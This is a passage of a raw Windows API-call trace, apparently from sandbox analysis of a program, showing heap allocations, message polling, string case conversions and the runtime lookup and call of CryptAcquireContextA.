[0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.249] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.249] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.249] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.250] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.250] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.250] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0256.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0256.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.255] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0256.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0256.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.256] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.257] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.259] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.260] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.260] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0256.260] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.260] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0256.260] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.261] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.261] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.261] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.261] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.261] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.261] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.261] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.262] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.262] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.262] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.262] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.262] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.262] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 